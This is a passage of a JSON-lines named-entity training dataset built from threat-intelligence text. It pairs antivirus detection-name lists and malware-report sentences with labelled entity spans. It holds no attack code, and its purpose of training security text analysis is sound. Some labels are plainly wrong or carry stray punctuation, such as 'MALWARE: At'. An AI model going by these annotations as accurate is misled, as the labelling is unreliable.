Trojan/Win32.HDC Backdoor:Win32/Shuq.A Worm.Shuq Win32.Worm-email.Shuq.Eerm Email-Worm.Win32.Shuq I-Worm/Shuqing.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001436", "source": "cyner2_train"}} {"text": "Reasons for Taiwan being targeted range from being one of the sovereign states of the disputed South China Sea region to its emerging economy and growth with Taiwan being 
one of the most innovative countries in the High-Tech industry in Asia.", "spans": {"ORGANIZATION: High-Tech industry": [[215, 233]]}, "info": {"id": "cyner2_train_001438", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.DipNet.139264 W32/DipNet.f Trojan.Win32.DipNet.emkm W32/Dipnet.F Trojan.Netdepix.B Win32/Dipnet.NAD Net-Worm.Win32.DipNet.f Worm.DipNet!vTuZ7jF3dLw Worm.Win32.DipNet.139264[h] W32.W.DipNet.f!c Virus.Win32.Part.a Worm.Win32.Dipnet.NAD BackDoor.Xdoor.351 Worm.DipNet.Win32.8 BehavesLike.Win32.Trojan.ch W32/Dipnet.XULH-0302 Worm/DipNet.a WORM/DipNet.b W32/Netdepix.B!worm Worm[Net]/Win32.DipNet Win32/Dipnet.worm.139264 Worm:Win32/DipNet.H Win32/Oddbob.E Net-Worm.DipNet W32/Oddbob.E.worm Backdoor.Win32.Xdoor Worm/Dipnet.M Worm.Win32.DipNet.aMVE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001439", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DL.VB.IHEW Trojan-Spy.Win32.Bancos.alh!IK Trojan-Downloader.Win32.VB.tbx TR/Spy.65536.194 TSPY_ZBOT.SMDM Trojan.Spy.65536.194 TrojanDownloader.VB.vhu TrojanSpy:Win32/Bancos.KY Trojan-Downloader.Win32.VB.tbx Trojan-Spy.Win32.Bancos.alh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001441", "source": "cyner2_train"}} {"text": "On July 5, 2015 an unknown hacker publicly announced on Twitter that he had breached the internal network of Hacking Team – an Italian pentesting company known to purchase 0-day exploits and produce their own trojans.", "spans": {"THREAT_ACTOR: unknown hacker": [[19, 33]], "ORGANIZATION: Twitter": [[56, 63]], "ORGANIZATION: Hacking Team": [[109, 121]], "ORGANIZATION: pentesting company": [[135, 153]], "MALWARE: 0-day exploits": [[172, 186]], "MALWARE: trojans.": [[209, 217]]}, "info": {"id": "cyner2_train_001442", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Harnig!O Win32.Trojan-Downloader.Harnig.cu Trojan.Gobrena TROJ_HARNIG.FC 
Trojan-Downloader.Win32.Harnig.cu Trojan.Win32.Harnig.dpsezu PE:Trojan.DL.Tibs.fxl!1074175505 Trojan.DownLoader.13549 Downloader.Harnig.Win32.2 TROJ_HARNIG.FC TrojanDownloader.Harnig.alh TR/Dldr.Small.dib.6 Trojan[Downloader]/Win32.Harnig.cu Win32.TrojDownloader.Harnig.co.kcloud Trojan/Win32.Harnig Trojan-Downloader.Revelation.Tibs.B Trojan-Downloader.Win32.Harnig.cr W32/Harnig.CU!tr.dldr Downloader.Harnig.AP Trojan.Win32.Harnig.Aj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001443", "source": "cyner2_train"}} {"text": "Every one of these campaigns involved a Windows version of Derusbi.", "spans": {"THREAT_ACTOR: campaigns": [[19, 28]], "SYSTEM: Windows version": [[40, 55]], "MALWARE: Derusbi.": [[59, 67]]}, "info": {"id": "cyner2_train_001445", "source": "cyner2_train"}} {"text": "On October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers.", "spans": {"ORGANIZATION: Kaspersky Lab's": [[21, 36]], "SYSTEM: advanced exploit prevention systems": [[37, 72]], "VULNERABILITY: Adobe Flash zero day": [[90, 110]], "MALWARE: exploit": [[111, 118]], "ORGANIZATION: customers.": [[148, 158]]}, "info": {"id": "cyner2_train_001446", "source": "cyner2_train"}} {"text": "The service offers a binder tool that allows users to masquerade their malware as legitimate software.", "spans": {"MALWARE: binder tool": [[21, 32]], "MALWARE: malware": [[71, 78]]}, "info": {"id": "cyner2_train_001447", "source": "cyner2_train"}} {"text": "Malwarebytes has been observing a surge in drive-by download attacks since the recent Flash zero-day now patched.", "spans": {"ORGANIZATION: Malwarebytes": [[0, 12]], "VULNERABILITY: Flash zero-day": [[86, 100]]}, "info": {"id": "cyner2_train_001449", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanAPT.BrowsPass.ST3 Trojan.MSIL.Ubibila.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 MSIL.Trojan.Pinject.A 
Trojan-Dropper.Win32.Sysn.bgns Trojan.Win32.MailPassView.dzxrgp Tool.MailPassView.236 BehavesLike.Win32.Trojan.gc Trojan.PSW.Fareit.te TR/Dropper.MSIL.sbcsg Trojan:MSIL/Golbla.B Trojan-Dropper.Win32.Sysn.bgns Trojan/Win32.Golbla.C1246680 Trj/CI.A Win32.Trojan-dropper.Sysn.Akyi Trojan.Inject MSIL/Injector.MRD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001451", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AutorunXjyv.Worm Trojan.Dropper.VIO Trojan/W32.Chydo.569344.E Trojan.KillAv.DR Trojan.Chydo Win32.Worm.Autorun.j Win32/Pykspa.C WORM_MESSEN.SMF Trojan.Dropper.VIO Worm.Win32.AutoRun.iea Trojan.Dropper.VIO Trojan.Win32.Chydo.eahreo Trojan.Win32.Chydo.516096.B Trojan.Dropper.VIO Trojan.MulDrop5.14836 Worm.AutoRun.Win32.116380 WORM_MESSEN.SMF BehavesLike.Win32.Backdoor.hc Trojan/Chydo.bj Trojan.Dropper.VIO Worm.Win32.AutoRun.iea TrojanDropper:Win32/Pykspa.A Trojan/Win32.Chydo.R40147 Trojan.Dropper.VIO Trojan.Chydo Trojan.Win32.FakeAlert.ate Trojan.Win32.KillAV.Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001452", "source": "cyner2_train"}} {"text": "In this post, we will be pulling apart and dissecting the Rambo backdoor and discussing several of its evasion techniques.", "spans": {"MALWARE: the Rambo backdoor": [[54, 72]]}, "info": {"id": "cyner2_train_001453", "source": "cyner2_train"}} {"text": "DarkKomet variant, often dropped as patcher.exe", "spans": {"MALWARE: DarkKomet variant,": [[0, 18]]}, "info": {"id": "cyner2_train_001454", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodee5.Trojan.2bfc Trojan.Proxy.Wopla.Q Trojan-Proxy/W32.Wopla.20992.D Trojan.Wopla.Win32.59 Trojan/Proxy.Wopla.q Trojan.PR.Wopla!heGrkrdKLNg Trojan.Tannick.B Win32/Pokier.V TSPY_WOPLA.Q Trojan.Proxy.Wopla.Q Trojan-Proxy.Win32.Wopla.q Trojan.Proxy.Wopla.Q Trojan.Win32.Wopla.csuaej PE:Trojan.Proxy.Wopla.ay!100004534 Trojan.Proxy.Wopla.Q TrojWare.Win32.TrojanDownloader.Small.AA 
Trojan.Proxy.Wopla.Q TSPY_WOPLA.Q BehavesLike.Win32.Downloader.mc W32/Trojan.AXS TrojanProxy.Wopla.d TR/Proxy.Wopla.Q.4 Win32.Troj.Wopla.q.kcloud Trojan.Proxy.Wopla.Q Win-Trojan/Wopla.20992 TrojanProxy.Wopla Trj/Alpiok.A Trojan-Proxy.Win32.Wopla.Q Multidr.J!tr Proxy.BKA.dropper Trojan.Win32.Wopla.AdJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001455", "source": "cyner2_train"}} {"text": "We rapidly determined that this spam campaign was attempting to broadly deliver TeslaCrypt 4.1A to individuals.", "spans": {"THREAT_ACTOR: spam campaign": [[32, 45]], "MALWARE: TeslaCrypt 4.1A": [[80, 95]], "ORGANIZATION: individuals.": [[99, 111]]}, "info": {"id": "cyner2_train_001456", "source": "cyner2_train"}} {"text": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations.", "spans": {"ORGANIZATION: FireEye Threat Intelligence": [[0, 27]], "THREAT_ACTOR: spear phishing campaign": [[50, 73]], "ORGANIZATION: media organizations.": [[127, 147]]}, "info": {"id": "cyner2_train_001459", "source": "cyner2_train"}} {"text": "A backdoor also known as: DoS.Small W32/VirTool.OH Bloodhound.W32.EP DoS.Win32.Small.e Trojan.Win32.Small.dosb Flooder.Upsend W32/Tool.GNXW-3960 DoS.Small.c HackTool[DoS]/Win32.Small DoS:Win32/Small.E DoS.Win32.Small.e DoS.Small Win32.Trojan.Small.Lnoh DoS.Win32.Small W32/Small.E!dos", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001460", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.UsernameReimuatH.Trojan Worm/W32.WBNA.294912.AU Trojan.Win32.Diple!O Trojan.Beebone.D Trojan/VBObfus.fz Win32.Worm.Pronny.d Win32/VB.KXfdHDB WORM_VOBFUS.SM37 Win.Packer.VBCrypt-5731517-0 Worm.Win32.Vobfus.erof Trojan.Win32.Vobfus.enwdjc Win32.Worm.Vobfus.Wvay Win32.HLLW.Autoruner2.18084 WORM_VOBFUS.SM37 BehavesLike.Win32.Autorun.dh Win32.Virut.ce.57344 Trojan.Symmi.D13A73 Trojan.Win32.A.Diple.299008.BAT 
Worm.Win32.Vobfus.erof Worm/Win32.WBNA.R108353 TScope.Trojan.VB Worm.Win32.Vobfus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001462", "source": "cyner2_train"}} {"text": "Once OSX/Dok infection is complete, the attackers gain complete access to all victim communication, including communication encrypted by SSL.", "spans": {"MALWARE: OSX/Dok": [[5, 12]], "THREAT_ACTOR: attackers": [[40, 49]]}, "info": {"id": "cyner2_train_001465", "source": "cyner2_train"}} {"text": "Once in the live session, if there is a file in /var/lib/man.cy, then this is an infected ISO.", "spans": {"MALWARE: infected ISO.": [[81, 94]]}, "info": {"id": "cyner2_train_001467", "source": "cyner2_train"}} {"text": "At a high level, Romberik is a complex piece of malware that is designed to hook into the user's browser to read credentials and other sensitive information for exfiltration to an attacker controlled server, similar to Dyre.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: Romberik": [[17, 25]], "MALWARE: malware": [[48, 55]], "MALWARE: Dyre.": [[219, 224]]}, "info": {"id": "cyner2_train_001468", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.Avisa.69632 Trojan-PSW.Win32!O W32/Inttest.worm PWS-Inttest.B TROJ_AVISA.B Win32.Trojan.WisdomEyes.16070401.9500.9757 W32/Risk.CNKX-3667 Infostealer.Avisa Win32/PSW.Cript.B Trojan-PSW.Win32.Deintel Trojan.Win32.Avisa-Psw.fdrj Trojan.Win32.Avisa.69632 Trojan.Avisa.Win32.2 BehavesLike.Win32.PJTbinder.km Worm.Pws.Inttest Trojan/PSW.Avisa Trojan[PSW]/Win32.Deintel Trojan-PSW.Win32.Deintel Trojan/Win32.HDC.C89238 TrojanPSW.Deintel Trj/PSW.Intetest Win32/PSW.Avisa.A Win32.Trojan-qqpass.Qqrob.Sxoe Trojan.PSW.Avisa W32/Avisa.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001469", "source": "cyner2_train"}} {"text": "Related insfrastructure shows another suspicious looking domain that mimics the Court of Arbitration for Sport", "spans": {"SYSTEM: insfrastructure": 
[[8, 23]], "ORGANIZATION: the Court of Arbitration for Sport": [[76, 110]]}, "info": {"id": "cyner2_train_001472", "source": "cyner2_train"}} {"text": "Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.", "spans": {"ORGANIZATION: foreign": [[71, 78]], "ORGANIZATION: security policy": [[83, 98]]}, "info": {"id": "cyner2_train_001473", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Backdoor.Bifrose Trojan.Win32.Small.cup Trojan.Win32.Buzus.rbpz Trojan.Win32.Buzus.86895 Trojan.MulDrop.18143 BehavesLike.Win32.Backdoor.hc Trojan/Buzus.fcx Virus.Trojan.Win32.Buzus.acj W32/Trojan2.AGMZ Trojan/Buzus.cf TrojanDropper:Win32/Buzus.B W32.W.Ridnu.ls5O Trojan.Win32.Small.cup Trojan/Win32.Buzus.C71809 Trojan.Buzus W32/Kryptix.KZB!tr Win32/Trojan.6a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001474", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.771B Ransom.Cerber.A4 Ransom.Cerber Trojan.Symmi.D13E52 Ransom_HPCERBER.SM3 Win32.Trojan.Kryptik.avs Ransom_HPCERBER.SM3 Trojan-Ransom.Win32.Rack.hly Trojan.Win32.Rack.evkhfe Trojan.Encoder.761 BehavesLike.Win32.Ransomware.gh Ransom.Win32.Teerac Trojan.Rack.dk Trojan-Ransom.Win32.Rack.hly Trojan.Menti Trj/GdSda.A W32/Kryptik.FSUS!tr Win32/Trojan.Ransom.7c1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001475", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Yafive.A.mue Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan-Downloader.Win32.QQHelper.air Troj.Spy.W32.Zbot.kYVW TrojWare.Win32.TrojanDownloader.Tiny.~CA BackDoor.Update.293 Win32.Hack.XComp.a.410674 TrojanDownloader:Win32/Yafive.A Trojan-Downloader.Win32.QQHelper.air TrojanDownloader.QQHelper Trojan-Downloader.Win32.QQHelper", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001479", 
"source": "cyner2_train"}} {"text": "It recently resurfaced in November 2016 W32.Disttrack.B, again attacking targets in Saudi Arabia.", "spans": {"ORGANIZATION: Saudi Arabia.": [[84, 97]]}, "info": {"id": "cyner2_train_001481", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Yodo.A@mm Worm/W32.Yodo.1273856 W32/Yodo.a Win32.Yodo.E90817 WORM_YODO.F W32.Yodo@mm Win32/Yodo.D WORM_YODO.F Win32.Yodo.A@mm Email-Worm.Win32.Yodo.a Win32.Yodo.A@mm Trojan.Win32.Yodo.bdnumu W32.W.Yodo.a!c Win32.Yodo.A@mm Worm.Win32.Yodo.B.Dropper Win32.Yodo.A@mm Trojan.MulDrop.572 Worm.Yodo.Win32.1 BehavesLike.Win32.VBObfus.tm W32/Risk.OQBD-6759 Worm/Yodo.b Worm:Win32/Yodo.B.dr WORM/Yodo.A.1 Worm[Email]/Win32.Yodo Worm.Yodo.a.kcloud Worm:Win32/Yodo.B.dr Email-Worm.Win32.Yodo.a Worm.Yodo Win32/Yodo.B.Dropper Win32.Worm-email.Yodo.Eddu I-Worm.Yodo!uEen0717POE W32/Yodo.A!worm Win32/Worm.bde", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001482", "source": "cyner2_train"}} {"text": "We don't have the statistics of devices vulnerable to both issues at the same time.", "spans": {"VULNERABILITY: devices vulnerable": [[32, 50]]}, "info": {"id": "cyner2_train_001483", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Krypt.8 TROJ_TDSS.SMA Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_TDSS.SMA Packed.Win32.TDSS.aa Trojan.Win32.Tdss.btyvr Win32.PkdTdss Trojan.Packed.2936 BehavesLike.Win32.Adware.kc TrojanDropper:Win32/Sudiet.A Packer.W32.Tdss!c Packed.Win32.TDSS.aa Trojan/Win32.ADH.R21764 Trojan.TDSS.01414 Win32.Packed.Tdss.Akox Packer.Win32.Tdss W32/PackTDss.K!tr Win32/Trojan.5b8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001484", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Bundpil.d Win32.Worm.Resparc.B Trojan:Win32/Lodbak.A Trojan/Win32.Lodbak.R151670 Trj/Gamarue.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001487", "source": 
"cyner2_train"}} {"text": "Intrusions began as early as 1996.", "spans": {}, "info": {"id": "cyner2_train_001488", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Scrop.exbmlp BehavesLike.Win32.AdwareConvertAd.fh W32/Trojan.YEZU-6096 TrojanDropper.Scrop.ns Trojan[Dropper]/Win32.Scrop Backdoor:Win32/Blopod.A!bit Trojan.Symmi.D13661 Dropper/Win32.Scrop.C2319178 TrojanDropper.Scrop Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001489", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Netstop.A Backdoor.Padmin Backdoor.W32.Padmin.08!c Trojan/wGet.d Backdoor.Padmin.0.8 W32/Risk.LANR-3940 Win.Trojan.Padmin-2 Backdoor.Padmin.0.8 Trojan.Netstop.A Trojan.Win32.Padmin.dyyica Backdoor.Win32.Padmin.08 Trojan.Netstop.A BackDoor-ATM.dr Backdoor/Padmin.08.Install DR/Padmin.08 BackDoor-ATM.dr Backdoor.Padmin Bck/Iroffer.BG Win32/Padmin.08.A.dropper W32/Padmin.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001491", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.Heur.cmSfNKMeS5mk WORM_AMBLER.SMI Win32.Trojan.WisdomEyes.16070401.9500.9938 WORM_AMBLER.SMI Trojan.Win32.BHO.bmciwr Trojan.PWS.Finanz.origin W32/Ambler.dll TrojanDownloader:Win32/BHO.A TrojanDownloader.BHO Trj/CI.A Win32.Trojan.Spy.Hrza TrojanSpy.Banker!l0YgZsorMww Trojan-Spy.Finanz.J W32/Ambler.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001492", "source": "cyner2_train"}} {"text": "This new report is an updated dissection of the group's attacks and methodologies—something to help organizations gain a more comprehensive and current view of these processes and what can be done to defend against them.", "spans": {"THREAT_ACTOR: group's": [[48, 55]], "ORGANIZATION: organizations": [[100, 113]]}, "info": {"id": "cyner2_train_001494", "source": "cyner2_train"}} {"text": "The email messages used in the attacks leverage themes related to economic 
development and politics in Burma, which is relevant to the work of the NGO.", "spans": {"ORGANIZATION: NGO.": [[147, 151]]}, "info": {"id": "cyner2_train_001495", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan:Win32/Vareids.A Trojan.FakeAV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001496", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.VBKrypt!O Worm.Rebhip.B3 Troj.W32.Scar!c Trojan/Injector.eyu Trojan.Win32.Scar.odxb Trojan.Win32.VBKrypt.ecjqdh Trojan.Win32.A.VBKrypt.200710 TrojWare.Win32.VBKrypt.cjb Trojan.Inject.27856 Trojan.VBKrypt.Win32.39868 BehavesLike.Win32.PWSSpyeye.cc W32/Trojan.FNVH-2986 Trojan/VBKrypt.bgwm Trojan/Win32.VBKrypt Trojan.ManBat.1 Trojan.Win32.Scar.odxb Trojan/Win32.VBKrypt.C66955 PWS-Spyeye.el SScope.Malware-Cryptor.VBCR.1841 Win32.Trojan.Scar.Tccd Trojan.VBKrypt!joEshOiwspo Win32/Trojan.00c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001497", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/VB.qtt Backdoor.Win32.Sdbot.aeua Trojan.Win32.Nifclop.bbwtga Trojan.DownLoader6.34031 TR/Nifclop.A.6 Trojan:Win32/Nifclop.A Backdoor.Win32.Sdbot.aeua Win32/VB.QTT Trojan.Win32.Nifclop Win32/Trojan.fdb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001498", "source": "cyner2_train"}} {"text": "During the last few days, we have observed a campaign redirecting visitors from large websites to the Angler EK.", "spans": {"THREAT_ACTOR: campaign": [[45, 53]], "MALWARE: Angler EK.": [[102, 112]]}, "info": {"id": "cyner2_train_001499", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Gamarue.2!O TrojanDropper.Dexel.A5 Trojan.Blocker.Win32.18819 WORM_DEXEL.SM Win32.Trojan.WisdomEyes.16070401.9500.9869 W32/Autorun.LWDQ-2252 W32.SillyFDC Win32/Dapato.AY WORM_DEXEL.SM Trojan.Win32.Blocker.dbnfux Troj.Dropper.W32.FrauDrop.tnsr BehavesLike.Win32.Trojan.fh W32/Autorun.ABG 
TrojanDropper.Dapato.pgs Trojan[Dropper]/Win32.Dapato TrojanDropper:Win32/Dexel.A Trojan.Zusy.D26D16 Win32.Trojan.Dapato.B HEUR/Fakon.mwf TrojanDropper.FrauDrop Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001501", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SvchostVS.Trojan Worm.Moarider Trojan/Autoit.nlq Win32.Trojan.AutoIt.a Bloodhound.Malautoit WORM_SOHANAD_EH110001.UVPC Trojan.Win32.Autoit.aza Trojan.Script.AutoIt.dbycya Troj.W32.Autoit.lWNh TrojWare.Win32.Autoit.AZA Trojan.DownLoader19.27399 WORM_SOHANAD_EH110001.UVPC BehavesLike.Win32.Comame.fc Trojan.Win32.Autoit TR/BAS.Samca.1188111 Trojan:Win32/Svhoder.A Trojan.Heur.E6CE86 Trojan.Win32.Autoit.aza HEUR/Fakon.mwf Trojan.Autoit.Wirus Trojan.Autoit.NLQ Win32/Autoit.NLQ W32/Autoit.NLQ!tr W32/Sality.AH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001503", "source": "cyner2_train"}} {"text": "This infection is based on previously reported Gozi ISFB/Ursnif activity from March 6, 2023.", "spans": {"MALWARE: infection": [[5, 14]], "THREAT_ACTOR: Gozi ISFB/Ursnif": [[47, 63]]}, "info": {"id": "cyner2_train_001506", "source": "cyner2_train"}} {"text": "A backdoor also known as: PUP.Optional.BrSoftware Trojan.ADH Trojan-Banker.Win32.Lohmys.a Application.Win32.Midia.BR MalSign.Skodna.BRS Adware.Win32.Midia.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001507", "source": "cyner2_train"}} {"text": "It is designed to steal money from unsuspecting victims right off their bank accounts without them even noticing.", "spans": {}, "info": {"id": "cyner2_train_001509", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9866 W32/Trojan.IKAJ-5854 Infostealer.Banker.C Win32/Kollah.MWH Trojan.JarDrop.1 W32.Trojan.Dropper TR/Spy.ZBot.aww TrojanDropper:Win32/Jazuz.A Win32/Trojan.Spy.d85", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_001510", "source": "cyner2_train"}} {"text": "Indicators about some panels hosting the DDoS Blue Botnet", "spans": {"MALWARE: DDoS Blue Botnet": [[41, 57]]}, "info": {"id": "cyner2_train_001511", "source": "cyner2_train"}} {"text": "The utility can be installed on smartphones and tablets as a program named Insta Plus, Profile Checker, and Cleaner Pro.", "spans": {"SYSTEM: smartphones": [[32, 43]], "SYSTEM: tablets": [[48, 55]]}, "info": {"id": "cyner2_train_001513", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Minnerchek Trojan.Win32.S.Downloader.31046816 Trojan.Win32.Minnerchek Adware.Installcore Trojan:Win32/Minnerchek.A Dropper/Win32.CoinMiner.C2322242 Trj/Downloader.MEP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001514", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.689E PUP.Firseria/Variant Trojan.Application.Bundler.Morstar.30 Trojan.Dropper Win32/Tnega.ZRdFDZD Win.Adware.Morstar-136 not-a-virus:Downloader.Win32.Morstar.dhp Trojan.Win32.Morstar.dmuxrd Adware.Win32.Firseria.b Trojan.DownLoader11.57090 AdWare/Solimba.h RiskWare[Downloader]/Win32.Morstar TrojanDropper:Win32/Sventore.C not-a-virus:Downloader.Win32.Morstar.dhp Win32.Application.Morstar.E PUP/Win32.Solimba.R133806 PUP.Optional.Firseria PUA.Downloader! 
AdWare.BundleApp Win32/Application.164", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001517", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.D4E7E3 Win32.Trojan.WisdomEyes.16070401.9500.9858 Trojan.Win32.CFI.eurnzt Trojan.Win32.Z.Kazy.253952.EN TrojWare.Win32.FraudPack.P Trojan.Click2.54806 W32/Trojan.JQCG-7679 PWS:Win32/Reteged.B TrojanSpy.Dibik Trojan-Spy.Reteged Adware/Win32.180solutions.BM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001518", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Mlw.ewmnqj W32/Trojan.MKOX-6072 TR/Dropper.MSIL.citga Trj/CI.A Win32/Trojan.5e4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001519", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Cyn.18944.B Backdoor.Cyn Email-Worm.Win32.GOPworm.196 BKDR_CYN.C Backdoor.Trojan BKDR_CYN.C Backdoor.Win32.Cyn.12.a Trojan.Win32.Cyn.dotopq Backdoor.Win32.Cyn_12.EditSvr BackDoor.Cyn.12 Trojan.Cyn.Win32.1 BehavesLike.Win32.Trojan.lh W32/Risk.EBIW-7264 Backdoor/Cyn.f BDC/Cyn.12.A.EdS Backdoor:Win32/Cyn.1_02 Backdoor.Win32.Cyn.12.a Win-Trojan/Cyn_v12.18944 Email-Worm.Win32.GOPworm.196 SScope.Trojan.VBRA.3344 Bck/Cyn.12 Win32/Cyn.12 Backdoor.Cyn!pLjU0MDAXWM W32/Cyn.12!tr.bdr Win32/Backdoor.ac7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001520", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Exxroute.A3 Ransom.Cerber Win32.Trojan.Kryptik.bjk Ransom_CERBER.SM37 Win.Ransomware.Cerber-6162277-0 Trojan.Win32.Zerber.eltxmx Troj.Ransom.W32.Zerber.toho Trojan.DownLoader23.53130 Trojan.Kryptik.Win32.1113485 Ransom_CERBER.SM37 BehavesLike.Win32.Ransom.kh Trojan.Zerber.atr Backdoor:Win32/Crugup.B W32/Kryptik.FOLJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001522", "source": "cyner2_train"}} {"text": "Typically, 
these campaigns leverage spear phishing as the delivery vector and often include malicious attachments designed to bypass typical detection controls.", "spans": {"THREAT_ACTOR: campaigns": [[17, 26]]}, "info": {"id": "cyner2_train_001523", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.BackdoorKasidetAF.Trojan Backdoor/W32.Kasidet.87040 Trojan.Dynamer.20568 Backdoor.W32.Kasidet.tnrA BKDR_NEUTRINO.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Kasidet.J BKDR_NEUTRINO.SM Backdoor.Win32.Kasidet.bgo Trojan.Win32.Kasidet.dpmgpp Worm.Win32.Kasidet.CAK BackDoor.Neutrino.19 Backdoor.Kasidet.Win32.519 BehavesLike.Win32.TrojanShifu.mh Worm.Win32.Kasidet W32/Kasidet.INNN-8495 Backdoor/Kasidet.by TR/Hijacker.ldiu Trojan[Backdoor]/Win32.Kasidet Backdoor:Win32/Kasidet.C Backdoor.Win32.Kasidet.bgo Trojan/Win32.Dynamer.R156738 Backdoor.Kasidet Spyware.PasswordStealer Win32/Kasidet.AB Win32.Backdoor.Kasidet.Phgi Win32/Trojan.cd8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001524", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9978 Trojan.Win32.Infospy.everjh Trojan.Infospy.13 BehavesLike.Win32.FakeAlert.lh Trojan-Dropper.Win32.Jscrpt W32.Trojan.Emotet TrojanDropper:Win32/Jscrpt.A!bit Trj/CI.A Win32/Trojan.f75", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001525", "source": "cyner2_train"}} {"text": "He matched both PDB paths as wel as behaviour to these samples, this blog describes the changed made to CryptoApp as well as the active campaign.", "spans": {"MALWARE: CryptoApp": [[104, 113]], "THREAT_ACTOR: the active campaign.": [[125, 145]]}, "info": {"id": "cyner2_train_001532", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanpws.Tepfer Trojan-PSW.Win32.Tepfer.psxgjz Troj.Psw.W32.Tepfer!c Trojan.MSIL.Crypt TR/Dropper.MSIL.273998 Trojan-PSW.Win32.Tepfer.psxgjz Trojan:Win32/Matta.A!gfc TrojanPSW.Tepfer Trj/GdSda.A 
